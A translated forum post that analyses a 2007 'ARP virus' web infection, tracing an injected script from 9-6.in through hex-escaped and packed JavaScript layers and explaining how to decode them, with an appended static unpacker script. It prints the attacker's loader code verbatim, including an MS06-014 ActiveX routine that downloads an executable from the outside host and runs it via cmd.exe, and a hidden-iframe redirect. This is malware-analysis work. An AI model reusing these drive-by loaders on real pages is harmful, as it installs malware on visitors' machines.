Parsing the decryption method and the JavaScript technology behind the ARP virus

Source: Internet
Author: User

The purpose of this article is to explore JS-related techniques; virus removal is not the main goal, it only sets the scene for explaining some JS. Haha, the article is a bit long, so read it with a cup of coffee or tea and don't be impatient about learning!

Over the past two days a very widespread ARP virus has hit the company's network, making it impossible for anyone to access the Internet and causing great inconvenience to our work. I am writing down the removal process here in the hope that it helps you!

Symptom: a JS file link was found injected into the page header ---- <script src=http://9-6.in/n.js></script>;

Source: after some online searching I found that this is an Indian (.in) domain, but its IP address is in the United States, and the domain was registered on July 25. It looks as if everything was premeditated; solve the problem first;

Analysis:
1. First, download the JS file (http://9-6.in/n.js). Its code is as follows:

document.writeln("<script>window.onerror=function(){return true;}<\/script>");
document.writeln("<script src=\"http:\/\/9-6.in\/S368\/NewJs2.js\"><\/script>");
document.writeln("<script>");
document.writeln("function StartRun(){");
document.writeln("var Then = new Date()");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\"");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){");
document.writeln("} else ");
document.writeln("{document.cookie = \"Cookie1=popw.s; expires=\" + Then.toGMTString()");
document.writeln("document.write('<iframe width=0 height=0 src=\"http:\/\/9-6.IN\/s368\/T368.htm\"><\/iframe>');");
document.writeln("}");
document.writeln("}");
document.writeln("StartRun();");
document.writeln("<\/script>")
The first line, window.onerror = function(){return true;}, suppresses JS errors before anything else runs. Really sly, hiding yourself like that, haha! Next comes another JS file, http://9-6.in/s#/newjs2.js; reading on, StartRun() is called. Its main job is to write a cookie that expires after one day and to load a file (http://9-6.IN/s368/T368.htm) in a hidden iframe; the rest is nothing special;
2. Download this file (http://9-6.in/S368/NewJs2.js). Its code is as follows:

StrInfo="\x3c\x73\x63\x72\x69\x70\x74\x3e\x77\x69\x6e\x64\x6f\x77\x2e\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x72\x65\x74\x75\x72\x6e\x74\x72\x75\x65\x3b\x7d\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"+"\n"+
"\x3c\x73\x63\x72\x69\x70\x74\x3e"+"\n"+
"\x44\x5a\x3d\'\x78\x36\x38\x78\x37\x34\x78\x37\x34\x78\x37\x30\x78\x33\x41\x78\x32\x46\x78\x32\x46\x78\x33\x39\x78\x32\x44\x78\x33\x36\x78\x32\x45\x78\x36\x39\x78\x36\x45\x78\x32\x46\x78\x35\x33\x78\x33\x33\x78\x33\x36\x78\x33\x38\x78\x32\x46\x78\x35\x33\x78\x33\x33\x78\x33\x36\x78\x33\x38\x78\x32\x45\x78\x36\x35\x78\x37\x38\x78\x36\x35\'\x3b"+"\n"+
"\x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\x3b"+"\n"+
"\x66\x75\x6e\x63\x74\x69\x6f\x6e\x47\x6e\x4d\x73\x28\x6e\x29"+"\n"+
"\x7b"+"\n"+
"\x76\x61\x72\x6e\x75\x6d\x62\x65\x72\x4d\x73\x3d\x4d\x61\x74\x68\x2e\x72\x61\x6e\x64\x6f\x6d\x28\x29\x2a\x6e\x3b"+"\n"+
"\x72\x65\x74\x75\x72\x6e\'\x78\x37\x45\x78\x35\x34\x78\x36\x35\\x78\x36\x44\x78\x37\x30\'\x2b\x4d\x61\x74\x68\x2e\x72\x6f\x75\x6e\x64\x28\x6e\x75\x6d\x62\x65\x72\x4d\x73\x29\x2b\'\x78\x32\x45\x78\x37\x34\\x78\x36\x44\x78\x37\x30\'\x3b"+"\n"+
"\x7d"+"\n"+
"\x74\x72\x79"+"\n"+
"\x7b"+"\n"+
"\x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\x3b"+"\n"+
"\x76\x61\x72\x42\x66\x3d\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\"\x78\x36\x46\x78\x36\x32\\\x78\x36\x41\x78\x36\x35\x78\x36\x33\x78\x37\x34\"\x29\x3b"+"\n"+
"\x42\x66\x2e\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\"\x78\x36\x33\x78\x36\x43\x78\x36\x31\x78\x37\x33\x78\x37\x33\x78\x36\x39\x78\x36\x34\"\x2c\"\x78\x36\x33\x78\x36\x43\x78\x37\x33\x78\x36\x39\x78\x36\x34\x78\x33\x41\x78\x34\x32\x78\x34\x34\x78\x33\x39\x78\x33\x36\x78\x34\x33\x78\x33\x35\x78\x33\x35\x78\x33\x36\x78\x32\x44\x78\x33\x36\x78\x33\x35\x78\x34\x31\x78\x33\x33\x78\x32\x44\x78\x33\x31\x78\x33\x31\x78\x34\x34\x78\x33\x30\x78\x32\x44\x78\x33\x39\x78\x33\x38\x78\x33\x33\x78\x34\x31\x78\x32\x44\x78\x33\x30\x78\x33\x30\x78\x34\x33\x78\x33\x30\x78\x33\x34\x78\x34\x36\x78\x34\x33\x78\x33\x32\x78\x33\x39\x78\x34\x35\x78\x33\x33\x78\x33\x36\"\x29\x3b"+"\n"+
"\x76\x61\x72\x4b\x78\x3d\x42\x66\x2e\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74\x28\"\x78\x34\x44\x78\x36\x39\x78\x36\x33\x78\x37\x32\\x78\x36\x46\x78\x37\x33\x78\x36\x46\x78\x36\x36\x78\x37\x34\\x78\x32\x45\x78\x35\x38\"\x2b\"\x78\x34\x44\x78\x34\x43\\\x78\x34\x38\x78\x35\x34\x78\x35\x34\x78\x35\x30\"\x2c\"\"\x29\x3b"+"\n"+
"\x76\x61\x72\x41\x53\x3d\x42\x66\x2e\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74\x28\"\x78\x34\x31\x78\x36\x34\x78\x36\x46\x78\x36\x34\\x78\x36\x32\x78\x32\x45\x78\x35\x33\x78\x37\x34\x78\x37\x32\\x78\x36\x35\x78\x36\x31\x78\x36\x44\"\x2c\"\"\x29\x3b"+"\n"+
"\x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\x3b"+"\n"+
"\x41\x53\x2e\x74\x79\x70\x65\x3d\x31\x3b"+"\n"+
"\x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\x3b"+"\n"+
"\x4b\x78\x2e\x6f\x70\x65\x6e\x28\"\x78\x34\x37\x78\x34\x35\x78\x35\x34\"\x2c\x44\x5a\x2c\x30\x29\x3b"+"\n"+
"\x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\x3b"+"\n"+
"\x4b\x78\x2e\x73\x65\x6e\x64\x28\x29\x3b"+"\n"+
"\x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\x3b"+"\n"+
"\x4e\x73\x31\x3d\x47\x6e\x4d\x73\x28\x39\x39\x39\x39\x29\x3b"+"\n"+
"\x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\x3b"+"\n"+
"\x76\x61\x72\x63\x46\x3d\x42\x66\x2e\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74\x28\"\x78\x35\x33\x78\x36\x33\x78\x37\x32\x78\x36\x39\\x78\x37\x30\x78\x37\x34\x78\x36\x39\x78\x36\x45\x78\x36\x37\\x78\x32\x45\x78\x34\x36\x78\x36\x39\x78\x36\x43\x78\x36\x35\\x78\x35\x33\x78\x37\x39\x78\x37\x33\x78\x37\x34\x78\x36\x35\\x78\x36\x44\x78\x34\x46\x78\x36\x32\x78\x36\x41\x78\x36\x35\\x78\x36\x33\x78\x37\x34\"\x2c\"\"\x29\x3b"+"\n"+
"\x76\x61\x72\x4e\x73\x54\x6d\x70\x3d\x63\x46\x2e\x47\x65\x74\x53\x70\x65\x63\x69\x61\x6c\x46\x6f\x6c\x64\x65\x72\x28\x30\x29\x3b\x4e\x73\x31\x3d\x63\x46\x2e\x42\x75\x69\x6c\x64\x50\x61\x74\x68\x28\x4e\x73\x54\x6d\x70\x2c\x4e\x73\x31\x29\x3b\x41\x53\x2e\x4f\x70\x65\x6e\x28\x29\x3b\x41\x53\x2e\x57\x72\x69\x74\x65\x28\x4b\x78\x2e\x72\x65\x73\x70\x6f\x6e\x73\x65\x42\x6f\x64\x79\x29\x3b"+"\n"+
"\x41\x53\x2e\x53\x61\x76\x65\x54\x6f\x46\x69\x6c\x65\x28\x4e\x73\x31\x2c\x32\x29\x3b\x41\x53\x2e\x43\x6c\x6f\x73\x65\x28\x29\x3b\x76\x61\x72\x71\x3d\x42\x66\x2e\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74\x28\"\x78\x35\x33\\\x78\x36\x38\x78\x36\x35\x78\x36\x43\x78\x36\x43\x78\x32\x45\\\x78\x34\x31\x78\x37\x30\x78\x37\x30\x78\x36\x43\x78\x36\x39\\\x78\x36\x33\x78\x36\x31\x78\x37\x34\x78\x36\x39\x78\x36\x46\\\x78\x36\x45\"\x2c\"\"\x29\x3b"+"\n"+
"\x6f\x6b\x31\x3d\x63\x46\x2e\x42\x75\x69\x6c\x64\x50\x61\x74\x68\x28\x4e\x73\x54\x6d\x70\x2b\'\x78\x35\x43\x78\x35\x43\x78\x37\x33\x78\x37\x39\x78\x37\x33\x78\x37\x34\x78\x36\x35\x78\x36\x44\x78\x33\x33\x78\x33\x32\'\x2c\'\x78\x36\x33\x78\x36\x44\x78\x36\x34\\x78\x32\x45\x78\x36\x35\x78\x37\x38\x78\x36\x35\'\x29\x3b"+"\n"+
"\x71\x2e\x53\x48\x65\x4c\x4c\x45\x78\x65\x63\x75\x74\x65\x28\x6f\x6b\x31\x2c\'\x78\x32\x30\x78\x32\x46\x78\x36\x33\'\x2b\x4e\x73\x31\x2c\"\"\x2c\"\x78\x36\x46\x78\x37\x30\x78\x36\x35\x78\x36\x45\"\x2c\x30\x29\x3b"+"\n"+
"\x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\x3b"+"\n"+
"\x7d"+"\n"+
"\x63\x61\x74\x63\x68\x28\x4d\x73\x49\x29\x7b\x4d\x73\x49\x3d\x31\x3b\x7d"+"\n"+
"\x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\x3b"+"\n"+
"\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](StrInfo);
This code is fairly long and has protective measures: everything has been converted to hexadecimal escapes. Don't be afraid, there is a way. First make sure UltraEdit (UE) is installed, open it, paste the code in (obviously, haha), replace every \x with %, and then use its HTML code conversion function to decode it. That gives you the code decoded once. Haha, the author of this code is perverse and encoded it twice, so I had to decode twice, repeating the previous steps; after that you can see the final "original" code;
I won't post the fully decoded code, since it is harmful; after reading the steps above I believe you can obtain it yourself. Let's just talk about the core code here;

CODE:
// Core code
..............
"var Bf=document.createElement(\"\o\b\j\e\c\t\");"+"\n"+
"Bf.setAttribute(\"\c\l\a\s\s\i\d\",\"\c\l\s\i\d\:\B\D\9\6\C\5\5\6\-\6\5\A\3\-\1\1\D\0\-\9\8\3\A\-\0\0\C\0\4\F\C\2\9\E\3\6\");"+"\n"+
"var Kx=Bf.CreateObject(\"\M\i\c\r\o\s\o\f\t\.\X\"+\"\M\L\H\T\T\P\",\"\");"+"\n"+
"var AS=Bf.CreateObject(\"\A\d\o\d\b\.\S\t\r\e\a\m\",\"\");"+"\n"+
.............
"var cF=Bf.CreateObject(\"\S\c\r\i\p\t\i\n\g\.\F\i\l\e\S\y\s\t\e\m\O\b\j\e\c\t\",\"\");"+"\n"+
"var NsTmp=cF.GetSpecialFolder(0);Ns1=cF.BuildPath(NsTmp,Ns1);AS.Open();AS.Write(Kx.responseBody);"+"\n"+
"AS.SaveToFile(Ns1,2);AS.Close();var q=Bf.CreateObject(\"\S\h\e\l\l\.\A\p\p\l\i\c\a\t\i\o\n\",\"\");"+"\n"+
"ok1=cF.BuildPath(NsTmp+\'\s\y\s\t\e\m\3\2\',\'\c\m\d\.\e\x\e\');"+"\n"+
"q.SHeLLExecute(ok1,\'\/\c\'+Ns1,\"\",\"\o\p\e\n\",0);"+"\n"+
..............
The above is the core of the code. It uses the MS06-014 vulnerability to create an asynchronous XMLHTTP object, download the virus (*.exe) file and then run it!
3. Open the source of http://9-6.in/s#/t368.htm and you find a strange piece of JS, as shown below:

CODE:
<script>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('x("\0\6\9\5\i\h\j\4\f\\8\3\2\0\7\1\i\8\2\3\h\g\4\w\v\u\t\b\s\7\r\g\4\e\f\q\8\\3\2\0\7\1\e\4\d\c\p\5\\3\o\n\a\6\1\b\m\2\0\1\a\l\0\6\9\5\k")',34,34,'1970|151|164|162|42|143|157|156|160|163|56|12|15|76|74|146|75|40|11|51|50|167|155|165|144|57|147|152|70|66|63|123|eval'.split('|'),0,{}))
</script>

Recent score record of this post
Bound0 2007-8-6: prestige +1, encouraging the research spirit! :D


Veking [owner]

#2

As you can see, this code is also encrypted, with the tell-tale signature function(p,a,c,k,e,d). There are many examples of this encryption method on the Internet, so I will not elaborate on it; here is the decryption code:

CODE:
// The following code was found by searching on the Internet. The copyright belongs to the original author.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Untitled document</title>
</head>
<body>
<script>
// base of the token alphabet: 0-9, a-z, A-Z
a = 62;
function encode() {
  var code = document.getElementById('code').value;
  code = code.replace(/[\r\n]+/g, '');
  code = code.replace(/'/g, "\\'");
  // collect every distinct word, sorted, as the substitution dictionary
  var tmp = code.match(/\b(\w+)\b/g);
  tmp.sort();
  var dict = [];
  var i, t = '';
  for (i = 0; i < tmp.length; i++) {
    if (tmp[i] != t) dict.push(t = tmp[i]);
  }
  var len = dict.length;
  var ch;
  for (i = 0; i < len; i++) {
    ch = num(i);
    code = code.replace(new RegExp('\\b' + dict[i] + '\\b', 'g'), ch);
    // a word that already equals its own token needs no dictionary entry
    if (ch == dict[i]) dict[i] = '';
  }
  document.getElementById('code').value = "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}("
    + "'" + code + "'," + a + "," + len + ",'" + dict.join('|') + "'.split('|'),0,{}))";
}

// name of token number c in base a (same arithmetic as the unpacker's e())
function num(c) {
  return (c < a ? '' : num(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36));
}

function run() {
  eval(document.getElementById('code').value);
}
// strip the leading "eval" so evaluating the rest returns the unpacked source
function decode() {
  var code = document.getElementById('code').value;
  code = code.replace(/^eval/, '');
  document.getElementById('code').value = eval(code);
}
</script>
<textarea id="code" cols="80" rows="20">

</textarea><br/>
<input type="button" onclick="encode()" value="Encode"/>
<input type="button" onclick="run()" value="Run"/>
<input type="button" onclick="decode()" value="Decode"/>
</body>
</html>
After decryption, the code is:

CODE:
info="<script src=\"S368.jpg\"></script>"
document.write(info)
Next, open the link to that "image". Of course it is not really an image; view its source and you find the following code:

CODE:
Eval (function (p, a, c, k, e, r) {e = function (c) {return (c <? '': E (parseInt (c/a) + (c = c % a)> 35? String. fromCharCode (c + 29): c. toString (36)}; if (! ''. Replace (/^/, String) {while (c --) r [e (c)] = k [c] | e (c ); k = [function (e) {return r [e]}]; e = function () {return '\ w +'}; c = 1 }; while (c --) if (k [c]) p = p. replace (new RegExp ('\ B' + e (c) + '\ B', 'G'), k [c]); return p} ('e n = 1c; 12 13 () {} 12 14 () {1d {n = 1e 1f ("\ K \ l \ r \ 8 \ I \ 3 \ 6 \ j \ 3 \ 6 \ \ o \ 3 \ 6 \ 9 \ C \ 3 \ s \ K \ l \ r \ 8 \ I \ 3 \\ 6 \ 9 \ x ")} 1g (e) {Q} E a = n ["\ 15 \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] (" \ w \ 8 \ 4 \ 7 \ o \ 7 \ 6 \ r \ f ", "\ R \ 7 \ q \ 3 \ \ V \ 5 \ 4 \ l ",""); 1 h (a ["\ 7 \ 8 \ I \ 3 \ y \ L \ m"] ("\ z \ f \ l \ 4 \ 5 \ 9 \ 3 \ y \ 3 ")! =-1) {Q} E B = n ["\ 15 \ 3 \ 4 \ j \ 3 \ 6 \ o \ 3 \ 6 \ v \ \ 5 \ 4 \ l "] (); B = B ["\ f \ r \ s \ f \ 4 \ 6"] (0, 2 ); B + = "\\\\\\ v \\ 6 \\ d \\ k \\ 6 \ 5 \ J \\ x \\\\\ K \ \ l \ r \ 8 \ I \ 3 \ J \ x \ 1i \ 3 \ s \ K \ l \ \ r \ 8 \ I \ 3 \ 6 \ A \ 6 \ d \ m \ 7 \ q \ 3 \ \ f \ r \ f \ 3 \ 6 \ h \ d \ 8 \ m \ 7 \ k \ 9 \ \ 7 \ 8 \ 7 "; n ["\ j \ 3 \ 4 \ p \ 5 \ q \ s \ 5 \ h \ 1j \ F \ \ 8 \ 4 \ 6 \ D "] (1 k, 13 ); E c = n ["\ w \ I \ p \ 5 \ 4 \ 3 \ k \ d \ 6 \ D"] ("\ 7 "); E c = n ["\ w \ I \ p \ 5 \ 4 \ 3 \ k \ d \ 6 \ D"] ("\ 5 "); E c = n ["\ w \ I \ p \ 5 \ 4 \ 3 \ k \ d \ 6 \ D"] ("\ s "); E c = n ["\ w \ I \ p \ 5 \ 4 \ 3 \ k \ d \ 6 \ D"] ("\ h "); E c = n ["\ w \ I \ p \ 5 \ 4 \ 3 \ k \ d \ 6 \ D"] ("\ I "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ j \ 5 \ o \ 3 \ v \ 5 \ 4 \ l ", "\ 7 ", "\ S \ f \ h \ 6 \ 7 \ A \ 4 \ 16 \ o \ 5 \ 6 \ f \ G \ 8 \ 3 \ C \ w \ h \ 4 \ 7 \ o \ 3 \ N \ L \ s \ T \ \ 3 \ h \ 4 \ t \ "\ C \ f \ h \ 6 \ 7 \ A \ 4 \ 9 \\ f \ l \ 3 \ q \ "\ u \ g \ o \ 5 \ 6 \ d \ G \ 8 \ 3 \ C \ w \ h \ 4 \ 7 \ o \ 3 \ N \ L \ s \ T \ 3 \ \ h \ 4 \ t \ "\ f \ l \ 3 \ q \ 9 \ 5 \ \\ q \ 7 \ h \ 5 \ 4 \ 7 \ d \ 8 \ "\ u \ g \ o \ 5 \ 6 \ 5 \ B \ s \ B 
\ h \ B \ I \ B \ 3 \ B \ m \ B \ k \ \ g "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ j \ 5 \ o \ 3 \ v \ 5 \ 4 \ l ", "\ 5 ", "\ H \ g \ f \ 9 \ U \ r \ 8 \ t \" \ p \ V \\\\\\ \\\\ v \ 6 \ d \ k \ 6 \ 5 \ J \ x \ I \ 8 \ 4 \ 3 \ 6 \ 8 \ J \ x \ I \ F \ N \ v \\ 17 \ L \ U \ F \ 9 \ F \ N \ F \ l \ 4 \ 4 \ A \ 1l \ O \ O \ h \ 1m \ x \ W \ 7 \ 18 \ O \ j \ X \ 19 \ 1a \ O \ \ I \ 1n \ C \ 18 \ Y \ W \ l \ 4 \ Y \ 1o \ "\ B \\ H \ B \ H \ u \ g \ f \ 9 \ U \ r \ 8 \ t \ "\ h \ z \ I \ 9 \ 3 \ y \ 3 \ Z \ h \ 4 \ 6 \ 3 \ 3 \ 3 \ h \ V \ \ Z \ m \ "\ B \ H \ B \ x \ u \ g "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ j \ 5 \ o \ 3 \ v \ 5 \ 4 \ l ", "\ s ", "\ f \ 9 \ j \ A \ 3 \ h \ 7 \ 5 \ q \ R \ d \ q \ I \ 3 \ 6 \ f \ t \ "\ 1p \ D \ 1q \ d \ h \ r \ z \ 3 \ \ 8 \ 4 \ f \ "\ u \ g \ s \ G \ s \ 9 \ f \ r \ s \\ f \ 4 \ 6 \ 7 \ 8 \ k \ t \ H \ B \ s \ 9 \ q \ 5 \ f \ 4 \ I \ 8 \ I \ 3 \ y \ L \ m \ t \\"\\\\\\\\\\ "\ u \ g \ s \ P \ G \" \ q \ d \ h \ \ 5 \ q \ f \ J \ x \ K \ 3 \ z \ A \ d \ 6 \ J \ x \ p \ d \ 8 \ 4 \ 3 \ 8 \ 4 \ 9 \\ I \ F \ 1r \ "\ g "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ j \ 5 \ o \ 3 \ v \ 5 \ 4 \ l ", "\ h ", "\ d \ 9 \ 1s \ 5 \ z \ 3 \ j \ A \ 5 \ h \ 3 \ t \ s \ u \ g \ m \ d \ 6 \ t \ 5 \ G \ H \ g \ 5 \ S \ h \ \ 9 \ I \ 4 \ 3 \ z \ f \ t \ u \ 9 \ p \ d \ r \ 8 \\ 4 \ g \ 5 \ P \ u \ 10 \ o \ 5 \ 6 \ m \ G \ h \ 9 \ I \ 4 \ 3 \ z \ f \ t \ u \ 9 \ I \ 4 \ 3 \ z \ t \ \ 5 \ u \ 9 \ v \ 5 \ 4 \ l \ g \ m \ P \ G \\"\\\\\ \\\\\ j \ X \ 19 \ 1a \ 1b \ 1t \ x \ 1u \ W \ 3 \ y \ 3 \ \ "\ g "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ j \ 5 \ o \ 3 \ v \ 5 \ 4 \ l ", "\ I ", "\ H \ g \ 4 \ 6 \ D \ 10 \ f \ 9 \ F \ y \ 3 \ h \ t \ m \ u \ g \ 11 \ h \ 5 \ 4 \ h \ l \ t \ 3 \ u \ 10 \ \ 11 \ g \ 11 \ C \ 7 \ 8 \ I \ d \ C \ 9 \ h \ q \ d \\ f \ 3 \ t \ u \ g \ S \ Z \ f \ h \ 6 \ 7 \ A \ 4 \ 16 "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ w \ 8 \ 4 \ 7 \ o \ 7 \ 6 \ r \ f ", "\ v \ 6 \ d \ 4 \ 3 \ h \ 4", "\ x 
"); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ w \ 8 \ 4 \ 7 \ o \ 7 \ 6 \ r \ f ", "\ R \ 7 \ q \ 3 \ v \ 5 \ 4 \ l ", "\ h \ V \ C \ 7 \ 8 \ I \ d \ C \ f \ \ D \ f \ 4 \ 3 \ z \ X \ 1b \ z \ f \ l \ 4 \ 5 \ \ 9 \ 3 \ y \ 3 "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ w \ 8 \ 4 \ 7 \ o \ 7 \ 6 \ r \ f ", "\ v \ 5 \ 6 \ 5 \ z \ 3 \ 4 \ 3 \ 6", B ); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ w \ 8 \ 4 \ 7 \ o \ 7 \ 6 \ r \ f ", "\ F \ y \ 4 \ 17 \ 7 \ f \ 4 ", "\ 9 \ 6 \ 5 \ 6 \ g \ 9 \ M \ 7 \ A \ g \ 9 \ 3 \ y \ 3 \ g \ 9 \ I \ d \ h \ g \ 9 \ h \ d \ z \ g \ 9 \ \ s \ 7 \ 8 \ g \ 9 \ k \ M \ g \ 9 \ M \ g \ 9 \ 4 \\ 5 \ 6 \ g \ 9 \ 5 \ 6 \ T \ g \ 9 \ q \ M \ l \ g \ 9 \ f \ 7 \ 4 \ g \ 9 \ l \ 1v \ y \ g \ 9 \ 4 \ k \ M \ \ g \ 9 \ I \ q \ g \ 9 \ d \ h \ y \ g \ 9 \ o \\ s \ y \ g "); n ["\ j \ 3 \ 4 \ p \ d \ 8 \ m \ 7 \ k"] ("\ w \ 8 \ 4 \ 7 \ o \ 7 \ 6 \ r \ f ", "\ 1w \ f \ 3 \ 6 \ j \ 3 \ 4", "\ x"); Q} 14 ();', 62,95, '| x65 | x74 | x61 | x72 | x69 | x6e | x2e | x6f | x73 | x3b | x63 | x64 | x53 | x67 | x68 | x66 | odks63ls | x76 | x43 | x6c | x75 | x62 | x28 | x29 | x50 | x41 | x31 | x78 | x6d | corner stone | x2c | x77 | x79 | var | x45 | x3d | x30 | x49 | x7e | x54 | x4f | x7a | x58 | x2F | x2b | return | x46 | x3c | x6a | x52 | x3a | x2E | x33 | x6D | x2f | x7b | x7d | function | assort_panel_enabled | pslcdkc | x47 | x3e | x4c | x6E | x36 | x38 | x32 | null | try | new | ActiveXObject | catch | if | x57 | x6b | 106 | x3A | x6B | x6F | x6C | x4d | x44 | x35 | x4e | x5B | x5D | x71 | x55 '. split ('|'), 0 ,{}))
It's a long piece of code, and once again I found function(p,a,c,k,e,r). Keep decoding; the decoded code is very long, so please check it yourself. The method above was applied here too: first encrypted with the packer function, then converted to hexadecimal, doing everything possible to confuse the reader and hide the real purpose. The main function of this code is to download and run the virus by yet another method: it actually calls Web Thunder (webxunlei) to download the virus and then runs it. The idea is really advanced, and the author is really painstaking, using two different methods to download the virus. "You don't believe it!", haha
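Both decoding steps the post performs by hand (peeling the \xNN layers in UltraEdit, then unpacking the function(p,a,c,k,e,d) wrapper with the eval-based decoder above) can be done statically, without executing the sample at all. The following Node.js script is an added example and is not code from the original post or from any tool it mentions: it extracts the packer's arguments with a regular expression, re-implements the packer's token substitution, and decodes \xNN, \NNN and %NN escape layers repeatedly until the text stops changing. The packed string, the escape samples and all function names (unpackPacked, peelEscapeLayers and so on) are constructed for this example rather than taken from the page.

```javascript
'use strict';

// Decode the body of a JavaScript string literal (what sits between the quotes):
// \n \r \t, \xHH, \uHHHH, legacy octal \NNN, and identity escapes such as \' \" \\.
function unescapeJsLiteral(body) {
  let out = '';
  for (let i = 0; i < body.length; i++) {
    const ch = body[i];
    if (ch !== '\\') { out += ch; continue; }
    const nx = body[++i];
    if (nx === undefined) break;
    if (nx === 'n') out += '\n';
    else if (nx === 'r') out += '\r';
    else if (nx === 't') out += '\t';
    else if (nx === 'x' && /^[0-9a-fA-F]{2}$/.test(body.slice(i + 1, i + 3))) {
      out += String.fromCharCode(parseInt(body.slice(i + 1, i + 3), 16)); i += 2;
    } else if (nx === 'u' && /^[0-9a-fA-F]{4}$/.test(body.slice(i + 1, i + 5))) {
      out += String.fromCharCode(parseInt(body.slice(i + 1, i + 5), 16)); i += 4;
    } else if (/[0-7]/.test(nx)) {
      let oct = nx; // up to three octal digits, value capped at 255 as the engine does
      while (oct.length < 3 && /[0-7]/.test(body[i + 1] || '') && parseInt(oct + body[i + 1], 8) <= 255) oct += body[++i];
      out += String.fromCharCode(parseInt(oct, 8));
    } else out += nx;
  }
  return out;
}

// Name of token number c in the packer's base-a alphabet: 0-9, a-z, then A-Z
// (the same arithmetic as the packer's e() helper).
function packerToken(c, a) {
  const prefix = c < a ? '' : packerToken(Math.floor(c / a), a);
  const r = c % a;
  return prefix + (r > 35 ? String.fromCharCode(r + 29) : r.toString(36));
}

// Matches the trailing call: ...}('p', a, c, 'k'.split('|'), ...)
const PACKER_ARGS = /\}\s*\(\s*'((?:[^'\\]|\\[\s\S])*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\[\s\S])*)'\s*\.split\(\s*'\|'\s*\)/;

// Static unpacker: dictionary substitution only, nothing is evaluated.
function unpackPacked(src) {
  const m = PACKER_ARGS.exec(src);
  if (!m) throw new Error('not a recognised p,a,c,k,e,d call');
  const p = unescapeJsLiteral(m[1]);
  const a = parseInt(m[2], 10);
  const c = parseInt(m[3], 10);
  const k = unescapeJsLiteral(m[4]).split('|');
  let out = p;
  for (let i = c - 1; i >= 0; i--) {
    if (!k[i]) continue; // empty dictionary slot: the token stands for itself
    const re = new RegExp('\\b' + packerToken(i, a) + '\\b', 'g');
    out = out.replace(re, () => k[i]);
  }
  return out;
}

// One pass of the post's "replace \x with % and decode" step, generalised to the
// three escape forms seen across the layers: \xHH, %HH and octal \NNN.
function decodeEscapeLayer(s) {
  return s.replace(/\\x([0-9a-fA-F]{2})|%([0-9a-fA-F]{2})|\\([0-7]{1,3})/g,
    (_, hex, pct, oct) => String.fromCharCode(
      hex !== undefined ? parseInt(hex, 16) : pct !== undefined ? parseInt(pct, 16) : parseInt(oct, 8)));
}

// Repeat the pass until nothing changes (the post needed two rounds); returns every layer.
function peelEscapeLayers(s, maxRounds = 5) {
  const layers = [s];
  for (let i = 0; i < maxRounds; i++) {
    const next = decodeEscapeLayer(layers[layers.length - 1]);
    if (next === layers[layers.length - 1]) break;
    layers.push(next);
  }
  return layers;
}

// Constructed sample: the original was var s="\x68\x69";document.write(s), packed
// with base 62 and the dictionary document|s|var|write|x68|x69 (tokens 0..5).
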